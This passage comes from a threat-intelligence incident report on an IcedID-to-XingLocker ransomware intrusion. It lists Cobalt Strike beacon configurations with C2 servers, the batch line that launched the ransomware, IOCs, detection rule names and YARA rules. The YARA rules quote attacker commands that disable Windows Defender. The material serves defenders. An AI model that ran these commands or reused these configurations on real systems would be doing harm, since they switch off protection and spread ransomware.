\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"C2 Server\": \"kaslose.com,/jquery-3.3.1.min.js\",\r\n \"Jitter\": 37,\r\n \"Method 1\": \"GET\",\r\n \"Port\": 443,\r\n \"Polling\": 4000\r\n },\r\n \"time\": 1629006464435.3,\r\n \"md5\": \"5fe82e1ccc5a68c39f314aad79f16cbb\"\r\n }\r\n}\r\nThe following Cobalt Strike server was added to our Threat Feed on 07/26/2021.\r\ncdnsharepoi.xyz\r\ncdnchrome.xyz\r\n134.195.90.187:80\r\n134.195.90.186:80\r\n134.195.90.185:80\r\nHTTP User Agent:\r\nMozilla/5.0 (Windows NT 6.2; WOW64; Trident/5.0; rv:11.0) like Gecko 20210505604\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 15 of 24\n\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:fd4bc6cea4877646ccd62f0792ec0b62\r\nCertificate: [5c:d1:8b:c9:51:f2:5b:ed:ad:fe:6a:1e:c8:9c:ec:7f:29:12:7b:b2]\r\nNot Before: 2021/06/07 17:50:37 UTC\r\nNot After: 2021/09/05 17:50:37 UTC\r\nIssuer Org: Let's Encrypt\r\nSubject Common: cdnwin.xyz [cdnwin.xyz ]\r\nPublic Algorithm: rsaEncryption\r\nBased on the Subject Common name (cdnwin.xyz) we can see that there are 5 Cobalt Strike servers associated with this\r\ngroup all hosted on HostHatch, and registered by NameCheap. Still online as of 10/10/2021\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 10000,\r\n \"MaxGetSize\": 1398191,\r\n \"Jitter\": 10,\r\n \"C2Server\": \"134.195.90.186,/updates/query_result.php,134.195.90.185,/updates/query_result.php,cdnchrome.xyz,/updates/\r\n \"HttpPostUri\": \"/updates/lims.php\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 21 bytes from the end\",\r\n \"Remove 66 bytes from the beginning\",\r\n \"Base64 decode\"\r\n ],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 0,\r\n \"bStageCleanup\": \"False\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"True\",\r\n \"bProcInject_UseRWX\": \"True\",\r\n \"bProcInject_MinAllocSize\": 16384,\r\n \"ProcInject_PrependAppend_x86\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_PrependAppend_x64\": \"Empty\",\r\n \"ProcInject_Execute\": [\r\n \"ntdll.dll:RtlUserThreadStart\",\r\n \"SetThreadContext\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"False\",\r\n \"HostHeader\": \"\"}\r\ncroperdate.com (146.70.24.133:443) - This Cobalt Strike server was added to our Threat Feed on 07/27/2021.\r\nJA3:a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s:ae4edc6faf64d08308082ad26be60767\r\nCertificate: [32:c6:10:53:d8:b9:78:25:57:24:fc:d0:a3:13:a1:02:fe:5a:69:e9]\r\nNot Before: 2021/07/27 10:49:01 UTC\r\nNot After: 2021/10/25 10:48:59 UTC\r\nIssuer Org: Let's Encrypt\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 16 of 24\n\nSubject Common: croperdate.com [croperdate.com ]\r\nPublic Algorithm: rsaEncryption\r\n\"x64\": {\r\n \"md5\": \"e830976cb63c0741f77d03e2380be20f\",\r\n \"sha256\": \"83b06b64509af99fb9c467149b00f1110249762f8afe611e37f60958e074d1ba\",\r\n \"config\": {\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n \"Method 1\": \"GET\",\r\n \"Jitter\": 37,\r\n \"C2 Server\": \"croperdate.com,/jquery-3.3.1.min.js\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"Port\": 443,\r\n \"Polling\": 5000\r\n },\r\n \"time\": 1627388580602.7,\r\n \"sha1\": \"b3cd1f976ed13ec2bc0abeef7ecea309c0c5461c\"\r\n },\r\n \"x86\": {\r\n \"md5\": \"a5449d92756386dd749a8013d5267f14\",\r\n \"sha256\": \"8da83bde3f4e7643a30ab818093981acef7e8870080db60a98286a1d9624dda1\",\r\n \"config\": {\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n \"Method 1\": \"GET\",\r\n \"Jitter\": 37,\r\n \"C2 Server\": \"croperdate.com,/jquery-3.3.1.min.js\",\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"Port\": 443,\r\n \"Polling\": 5000\r\n },\r\n \"time\": 1627388577368.7,\r\n \"sha1\": \"25a797d4679c40c1599949356cec9e350fdd5588\"\r\n }\r\nExfiltration\r\nNo exfiltration TTPs were observed while analyzing this intrusion, however, as stated in the case summary, it is possible that\r\nthe threat actors used Cobalt Strike (encrypted channel) to transmit sensitive data such as Word documents.\r\nImpact\r\nThe ransomware was executed on multiple servers using a batch script start.bat :\r\n@echo off\r\nrundll32 c:\\users\\public\\music\\update64.dll,start\r\nHere is the first ransomware execution which was observed on the Domain Controller:\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 17 of 24\n\nBelow is another example of the ransomware execution on one of the external servers:\r\nOnce the encryption process was complete a file called RecoveryManual.html was left across the filesystem with the\r\ninstructions on how to contact the threat actors for the ransom negotiations.\r\nIOCs\r\nNetwork\r\nIcedID C2\r\n37.120.222.100\r\n176.97.64.194 calseled.bond\r\n176.97.64.194 riderskop.top\r\nfeedbackfileweb.club\r\n5.61.46.161 gsterangsic.buzz\r\nCobalt Strike C2\r\n146.70.24.133 croperdate.com\r\n146.70.24.186 kaslose.com\r\n134.195.90.187 cdnsharepoi.xyz\r\n134.195.90.187 cdngithub.xyz\r\n134.195.90.187 cdnwindow.xyz\r\n134.195.90.187 cdnchrome.xyz\r\n134.195.90.187 cdnwin.xyz\r\n134.195.90.186 cdnwin.xyz\r\n134.195.90.185 cdnwin.xyz\r\nFile\r\n0B330A76.bat\r\n348cae913e496198548854f5ff2f6d1e\r\na07655b9020205bd47084afd62a8bb22b48c0cdc\r\nc80128f51871eec3ae2057989a025ce244277c1c180498a5aaef45d5214b8506\r\nadf.bat\r\nc0fba1bdf26fdea254f29d035cfcb240\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 18 of 24\n\n76e49a572c2b468ff75387d340b871799fb514c0\r\n9a07559dd43d8defa9addf1d61d401cdecc121c3fd03789905c086875cbb918c\r\ncroperdate64.dll\r\n67c916ed405a3163d19f7642734d94be\r\n6f0edb57f316fd75a96c1365e7408cc51b165c1a\r\n1b981b4f1801c31551d20a0a5aee7548ec169d7af5dbcee549aa803aeea461a0\r\nfed1.bat\r\nb849c3fde795b901244033039b8ac7fc\r\n82226be6991b327a88f2e34d306e85fef3dc1a7c\r\n81a1247465ed4b6a44bd5b81437024469147b75fe4cb16dc4d2f7b912463bf12\r\nfed2.bat\r\n450319cd558fb091de5c1eb477279491\r\nb9be7387ad2363f240d6f9758565310bc070c5d8\r\nbf908d50760e3724ed5faa29b2a96cb1c8fc7a39b58c3853598d8b1ccfd424ac\r\nfed3.bat\r\nd66e39105b8c13e530e3965f058d74e1\r\nc94d92056db72aeac6d5c37e8f87b7be63065b25\r\n8dced0ed6cba8f97c0b01f59e063df6be8214a1bd510e4774ef7f30c78875f4e\r\nkaslose.dll\r\n922451995226138f5924a830e58dcf84\r\n05036842cc0faf1fe3c539e984af4ca96fb4478b\r\n320296ea54f7e957f4fc8d78ec0c1658d1c04a22110f9ddffa6e5cb633a1679c\r\nkaslose64.dll\r\n71d852063d97be95b841244ba2baa3b3\r\n1640828e4158ca867e35c4c2bd75fc7d2c32e82b\r\na4d92718e0a2e145d014737248044a7e11fb4fd45b683fcf7aabffeefa280413\r\nkasper.bat\r\nf72cab42a2ecb753e9cf1eca0fda9b75\r\nb0a303a9c5844aad78deafaa469f091d0fe78884\r\nfc2ab02ff0774921f49a1f78782a9c2634bacc76c149d5d16ab861ca9ce5d760\r\nspoolsv.exe\r\nbac8f1ac15380266049c693093350710\r\nef7ec279ef8bdca900f1190db945ad3f15d4f983\r\n0d575c22dfd30ca58f86e4cf3346180f2a841d2105a3dacfe298f9c7a22049a0\r\nstar.bat\r\nedc09807da2d733262c29f0fb184c6c2\r\n70dd6c21d031db5051a3635b8860c3a494c866ff\r\n6679848b93987eb8ca02f881e3542b9f54163264b18a13175b65e18ba711c905\r\nupdate64.dll\r\nffd1027dad6ba3eec0a8de67f9236d05\r\n61707322b2f5bb49dff51520fb0f9da866987153\r\n47ff886d229a013d6e73d660a395f7b8e285342195680083eb96d64c052dd5f0\r\nDetections\r\nNetwork\r\nSuricata\r\nET MALWARE Win32/IcedID Request Cookie\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nET DNS Query to a *.top domain - Likely Hostile\r\nThreatFox TrickBot botnet C2 traffic (ip:port - confidence level: 75%)\r\nETPRO POLICY Observed Atera Remote Access Application Activity Domain in TLS SNI\r\nET INFO Observed Let's Encrypt Certificate for Suspicious TLD (.xyz)\r\nThreatFox IcedID botnet C2 traffic (ip:port - confidence level: 75%)\r\nFeodo Tracker: potential TrickBot CnC Traffic detected\r\nET TROJAN Trickbot Checkin Response\r\nET INFO Dotted Quad Host DLL Request\r\nET INFO Suspicious Windows Commands in POST Body (ipconfig)\r\nET INFO Suspicious Windows Commands in POST Body (net config)\r\nET INFO Suspicious Windows Commands in POST Body (net view)\r\nET INFO Suspicious Windows Commands in POST Body (nltest)\r\nET POLICY IP Check Domain (icanhazip. com in HTTP Host)\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET TROJAN Win32/IcedID Request Cookie\r\nET TROJAN Win32/Trickbot Data Exfiltration\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 19 of 24\n\nSigma\r\nAbused Debug Privilege by Arbitrary Parent Processes –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/sysmon_abusing_debug_pr\r\nAutomated Collection Command Prompt –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/process_creation_automated_collection.yml\r\nBad Opsec Powershell Code Artifacts –\r\nhttps://github.com/SigmaHQ/sigma/blob/5e35e387dd0dcdd564db7077da3470fbc070b975/rules/windows/powershell/powershell_bad_opsec_artifacts.\r\nBloodhound and Sharphound Hack Tool –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_hack_bloodhound.yml\r\nCobaltStrike Process Patterns –\r\nhttps://github.com/SigmaHQ/sigma/blob/ee85fdfa3fda3d2861065f0e2f6a9d599b03e47e/rules/windows/process_creation/win_cobaltstrike_process_pa\r\nCobaltStrike Service Installations –\r\nhttps://github.com/SigmaHQ/sigma/blob/1b480f2ee609e196fcaf6bfee11cf26133f64435/rules/windows/builtin/win_cobaltstrike_service_installs.yml\r\nCobaltStrike Service Installations in Registry –\r\nhttps://github.com/SigmaHQ/sigma/blob/bbe67ddc73adaa245941fe240db4eff3279078a8/rules/windows/registry_event/sysmon_cobaltstrike_service_i\r\nEmpire PowerShell Launch Parameters –\r\nhttps://github.com/SigmaHQ/sigma/blob/7c42a9d6cbe8af82b1df3cdde67b9adf9f86ffa1/rules/windows/process_creation/win_susp_powershell_empire\r\nExecution from Suspicious Folder –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_execution_path.y\r\nFile Created with System Process Name –\r\nhttps://github.com/SigmaHQ/sigma/blob/ea430c8823803b9026a4e6e2ea7365dc5d96f385/rules/windows/file_event/sysmon_creation_system_file.yml\r\nFile or Folder Permissions Modifications –\r\nhttps://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_file_permission_modifi\r\nFirst Time Seen Remote Named Pipe –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_lm_namedpipe.yml\r\nLocal Accounts Discovery –\r\nhttps://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_local_system_owner_ac\r\nMalicious Base64 Encoded PowerShell Keywords in Command Lines –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_hidd\r\nMalicious PowerShell Commandlets –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/powershell/powershell_malicious_command\r\nMimikatz Detection LSASS Access –\r\nhttps://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/deprecated/sysmon_mimikatz_detection_lsas\r\nNet.exe Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_net_execution.ym\r\nNon Interactive PowerShell –\r\nhttps://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_power\r\nPowerShell as a Service in Registry –\r\nhttps://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/registry_event/sysmon_powershell_as_servic\r\nPowerShell Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/8aabb58eca06cc44ae21ae4d091793d8c5ca6a23/rules/windows/image_load/sysmon_powershell_execution_m\r\nPowerShell Network Connections –\r\nhttps://github.com/SigmaHQ/sigma/blob/7f071d785157dfe185d845fad994aa6ec05ac678/rules/windows/network_connection/sysmon_powershell_net\r\nPowerShell Scripts Installed as Services –\r\nhttps://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/builtin/win_powershell_script_installed_as_s\r\nRare Scheduled Task Creations –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/other/win_rare_schtask_creation.yml\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 20 of 24\n\nRare Service Installs –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_rare_service_installs.yml\r\nRegsvr32 Anomaly –\r\nhttps://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomal\r\nRegsvr32 Command Line Without DLL –\r\nhttps://github.com/SigmaHQ/sigma/blob/7c42a9d6cbe8af82b1df3cdde67b9adf9f86ffa1/rules/windows/process_creation/win_susp_regsvr32_no_dll.ym\r\nRegsvr32 Network Activity –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_regsvr32_netw\r\nRundll32 Internet Connection –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_rundll32_net_c\r\nRyuk Ransomware –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_malware_ryuk.yml\r\nSMB Create Remote File Admin Share –\r\nhttps://github.com/SigmaHQ/sigma/blob/8beb70e970b814d0ab60625206ea0d8a21a9bff8/rules/windows/builtin/win_smb_file_creation_admin_shares\r\nStop Windows Service –\r\nhttps://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_service_stop.yml\r\nSuccessful Overpass the Hash Attempt –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_overpass_the_hash.yml\r\nSuspicious AdFind Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_adfind.yml\r\nSuspicious Encoded PowerShell Command Line –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_enc_\r\nSuspicious In-Memory Module Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/5cf7078fb3d61f2c15b01d9426f07f9197dd3db1/rules/windows/process_access/sysmon_in_memory_assembl\r\nSuspicious PowerShell Cmdline –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/powershell/powershell_cmdline_reversed_st\r\nSuspicious PowerShell Parent Process –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_pare\r\nSuspicious Spool Service Child Process –\r\nhttps://github.com/SigmaHQ/sigma/blob/0b83c12dd1fcc906ce705c413d5ed5db90ce5e82/rules/windows/process_creation/win_susp_spoolsv_child_pr\r\nSuspicious WMI Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/5e701a2bcb353338854c8ab47de616fe7e0e56ff/rules/windows/process_creation/win_susp_wmi_execution.y\r\nWindows Defender Threat Detection Disabled –\r\nhttps://github.com/SigmaHQ/sigma/blob/f69868b5aa25f33c629208d8868994ed24b20b46/rules/windows/other/win_defender_disabled.yml\r\nWindows PowerShell Web Request –\r\nhttps://github.com/SigmaHQ/sigma/blob/9b7be5985ea6079e97a2a769404880fc9dd63994/rules/windows/powershell/win_powershell_web_request.ym\r\nYara\r\n/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2021-10-10\r\n Identifier: 5582 Xinglocker\r\n Reference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 21 of 24\n\nrule DLLBeacons {\r\n meta:\r\n description = \"for files: kaslose64.dll, spoolsv.exe, kaslose.dll, croperdate64.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-09-14\"\r\n hash1 = \"a4d92718e0a2e145d014737248044a7e11fb4fd45b683fcf7aabffeefa280413\"\r\n hash2 = \"0d575c22dfd30ca58f86e4cf3346180f2a841d2105a3dacfe298f9c7a22049a0\"\r\n hash3 = \"320296ea54f7e957f4fc8d78ec0c1658d1c04a22110f9ddffa6e5cb633a1679c\"\r\n hash4 = \"1b981b4f1801c31551d20a0a5aee7548ec169d7af5dbcee549aa803aeea461a0\"\r\n strings:\r\n $s1 = \"f14m80.dll\" fullword ascii\r\n $s2 = \"\\\\dxdiag.exe\" fullword ascii\r\n $s3 = \"\\\\regedit.exe\" fullword ascii\r\n $s4 = \"\\\\notepad.exe\" fullword ascii\r\n $s5 = \"\\\\mmc.exe\" fullword ascii\r\n $s6 = \"spawn::resuming thread %02d\" fullword ascii\r\n $s7 = \"xYYyQDllwAZFpV51\" fullword ascii\r\n $s8 = \"thread [%d]: finished\" fullword ascii\r\n $s9 = \"wmi: error initialize COM security\" fullword ascii\r\n $s10 = \"error initializing COM\" fullword ascii\r\n $s11 = \"spawn::first wait failed: 0x%04x\" fullword ascii\r\n $s12 = \"wmi: connect to root\\\\cimv2 failed: 0x%08x\" fullword ascii\r\n $s13 = \"jmPekFtanAOGET_5\" fullword ascii\r\n $s14 = \"spawn::decrypted\" fullword ascii\r\n $s15 = \"eQ_Jt_fIrCE85LW3\" fullword ascii\r\n $s16 = \"dBfdWB3uu8sReye1\" fullword ascii\r\n $s17 = \"qpp0WQSPyuCnCEm3\" fullword ascii\r\n $s18 = \"zn9gkPgoo_dOORd3\" fullword ascii\r\n $s19 = \"wmi: probaly running on sandbox\" fullword ascii\r\n $s20 = \"spawn::finished\" fullword ascii\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize \u003c 2000KB and ( 8 of them )\r\n ) or ( all of them )\r\n}\r\nrule fed3_fed2_4 {\r\n meta:\r\n description = \"for files: fed3.bat, fed2.bat\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-09-14\"\r\n hash1 = \"8dced0ed6cba8f97c0b01f59e063df6be8214a1bd510e4774ef7f30c78875f4e\"\r\n hash2 = \"bf908d50760e3724ed5faa29b2a96cb1c8fc7a39b58c3853598d8b1ccfd424ac\"\r\n strings:\r\n $s1 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\DefenderAuditLogger\\\" /v \\\"Start\\\" /t RE\r\n $s2 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\DefenderApiLogger\\\" /v \\\"Start\\\" /t REG_\r\n $s3 = \"reg delete \\\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"Windows Defender\\\" /f\" fullword a\r\n $s4 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullw\r\n $s5 = \"reg delete \\\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"WindowsDefender\\\" /f\" fullword as\r\n $s6 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WdFilter\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullwo\r\n $s7 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WdNisSvc\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullwo\r\n $s8 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WdBoot\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullword\r\n $s9 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SecurityHealthService\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\r\n $s10 = \"reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WdNisDrv\\\" /v \\\"Start\\\" /t REG_DWORD /d \\\"4\\\" /f\" fullw\r\n $s11 = \"reg delete \\\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\StartupApproved\\\\Run\\\" /v \\\"Windo\r\n $s12 = \"rem 0 - Disable Logging\" fullword ascii\r\n $s13 = \"rem Run \\\"Disable WD.bat\\\" again to disable WD services\" fullword ascii\r\n $s14 = \"schtasks /Change /TN \\\"Microsoft\\\\Windows\\\\ExploitGuard\\\\ExploitGuard MDM policy Refresh\\\" /Disable\" fullwor\r\n $s15 = \"reg delete \\\"HKCR\\\\Directory\\\\shellex\\\\ContextMenuHandlers\\\\EPP\\\" /f\" fullword ascii\r\n $s16 = \"reg delete \\\"HKCR\\\\*\\\\shellex\\\\ContextMenuHandlers\\\\EPP\\\" /f\" fullword ascii\r\n $s17 = \"reg delete \\\"HKCR\\\\Drive\\\\shellex\\\\ContextMenuHandlers\\\\EPP\\\" /f\" fullword ascii\r\n $s18 = \"schtasks /Change /TN \\\"Microsoft\\\\Windows\\\\Windows Defender\\\\Windows Defender Scheduled Scan\\\" /Disable\" ful\r\n $s19 = \"schtasks /Change /TN \\\"Microsoft\\\\Windows\\\\Windows Defender\\\\Windows Defender Cleanup\\\" /Disable\" fullword a\r\n $s20 = \"schtasks /Change /TN \\\"Microsoft\\\\Windows\\\\Windows Defender\\\\Windows Defender Verification\\\" /Disable\" fullw\r\n condition:\r\n ( uint16(0) == 0x6540 and filesize \u003c 10KB and ( 8 of them )\r\n ) or ( all of them )\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 22 of 24\n\n}\r\nrule fed3_fed1_5 {\r\n meta:\r\n description = \"for files: fed3.bat, fed1.bat\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-09-14\"\r\n hash1 = \"8dced0ed6cba8f97c0b01f59e063df6be8214a1bd510e4774ef7f30c78875f4e\"\r\n hash2 = \"81a1247465ed4b6a44bd5b81437024469147b75fe4cb16dc4d2f7b912463bf12\"\r\n strings:\r\n $s1 = \"rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference\" fullword ascii\r\n $s2 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\" /v \\\"SpynetReporting\\\" /t REG_DWORD\r\n $s3 = \"rem reg add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SecurityHealthService\\\" /v \\\"Start\\\" /t REG_DWORD /d\r\n $s4 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\" /v \\\"DisableAntiSpyware\\\" /t REG_DWORD /d \\\r\n $s5 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\" /v \\\"SubmitSamplesConsent\\\" /t REG_\r\n $s6 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\" /v \\\"DisableBlockAtFirstSeen\\\" /t R\r\n $s7 = \"rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!\" fullword ascii\r\n $s8 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableScanOnRea\r\n $s9 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableScanOnRea\r\n $s10 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableBehavior\r\n $s11 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableBehavior\r\n $s12 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableOnAccess\r\n $s13 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableRealtime\r\n $s14 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableIOAVProt\r\n $s15 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableRealtime\r\n $s16 = \"rem 1 - Disable Real-time protection\" fullword ascii\r\n $s17 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\" /v \\\"DisableAntiVirus\\\" /t REG_DWORD /d \\\"\r\n $s18 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableOnAccess\r\n $s19 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\MpEngine\\\" /v \\\"MpEnablePus\\\" /t REG_DWORD\r\n $s20 = \"reg add \\\"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\" /v \\\"DisableIOAVProt\r\n condition:\r\n ( uint16(0) == 0x6540 and filesize \u003c 10KB and ( 8 of them )\r\n ) or ( all of them )\r\n}\r\nrule spoolsv_kaslose_7 {\r\n meta:\r\n description = \"for files: spoolsv.exe, kaslose.dll\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-09-14\"\r\n hash1 = \"0d575c22dfd30ca58f86e4cf3346180f2a841d2105a3dacfe298f9c7a22049a0\"\r\n hash2 = \"320296ea54f7e957f4fc8d78ec0c1658d1c04a22110f9ddffa6e5cb633a1679c\"\r\n strings:\r\n $s1 = \"Protect End\" fullword ascii\r\n $s2 = \"ctsTpiHgtme0JSV3\" fullword ascii\r\n $s3 = \"Protect Begin\" fullword ascii\r\n $s4 = \"pZs67CJpQCgMm8L4\" fullword ascii\r\n $s5 = \"6V7e7z7\" fullword ascii\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize \u003c 2000KB and ( all of them )\r\n ) or ( all of them )\r\n}\r\nrule xinglocker_update64 